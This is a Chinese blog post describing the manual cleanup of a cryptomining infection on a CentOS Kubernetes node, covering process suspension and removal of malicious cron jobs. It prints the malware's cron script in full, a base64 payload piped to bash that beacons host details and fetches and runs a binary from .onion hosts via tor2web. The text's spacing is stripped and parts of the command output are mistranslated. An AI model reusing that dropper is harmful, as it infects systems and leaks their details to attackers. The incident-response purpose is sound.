后台,接管新环境。同事交接的时候说这些机器已经感染了挖矿病毒,还没有重装。该死。..线上环境不好动,只能手动查杀。操作系统如下:[root@k8s-node7~]#cat/etc/redhat-releaseCentOSLinuxrelease7.5.1804(Core)进程ssh起来,ps-ef看到如下:手动杀进程,a很快就会生成新的是的,猜测有一个守护进程。用STOP信号停止它。[root@k8s-node7~]#kill-STOP165224[root@k8s-node7~]#kill-STOP223135查看定时任务清理[root@k8s-node7~]#crontab-l8****/root/.systemd-service.sh>/dev/null2>&1&[root@k8s-node7~]#cat/root/.systemd-service.sh#!/bin/bashexec&>/dev/nullechotndtCwuLieAr5wvPgknqmFZpHZWrMf+G9UhUYqmI2z2sX3NaL+fIvmN+PKEvAKMkechodG5kdEN3dUxpZUFyNXd2UGdrbnFtRlpwSFpXck1mK0c5VWhVWXFtSTJ6MnNYM05hTCtmSXZtTitQS0V2QUtNawpleGVjICY+ZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0IG9uaW9uLmZvdW5kYXRpb24gb25pb24uY29tLmRlIG9uaW9uLnNoIHRvcjJ3ZWIuc3UgdG9yMndlYi5pbwpkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLTEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64-d|bash[root@k8s-node7~]#rm-f!$rm-f/root/.systemd-service.sh然后继续清理/var/spoon/cron/,/etc/crontab,/etc/cron*等目录或文件,[root@k8s-node7crontabs]#cd/etc/cron.d[root@k8s-node7cron.d]#ls0systemd-service[root@k8s-node7cron.d]#cat0systemd-service9****root/opt/systemd-service.sh>/dev/null2>&1&[root@k8s-node7cron.d]#pwd/etc/cron.d[root@k8s-node7cron.d]#rm-f0systemd-service[root@k8s-node7~]#ll-d/etc/cron.*drwxr-xr-x.2rootroot4096March1011:01/etc/cron.ddrwxr-xr-x。2rootroot4096Dec1815:31/etc/cron.daily-rw------。1根根02018年4月11日/etc/cron.denydrwxr-xr-x。2rootroot40962019年9月25日/etc/cron.hourlydrwxr-xr-x。2rootroot40962014年6月10日/etc/cron.monthlydrwxr-xr-x。2rootroot40962014年6月10日/etc/cron.weekly[root@k8s-node7~]#ll-d/etc/cron.*/*-rwx-----。1rootroot2192018年4月11日/etc/cron.daily/logrotate-rwxr-xr-x。1rootroot3922018年4月11日/etc/cron.hourly/0anacron-rwxr-xr-x。1rootroot191April11,2018/etc/cron.hourly/mcelog.cron还要查看boot目录等等,一一清理。这个时候杀掉之前的STOP进程,观察一会,看会不会自动启动
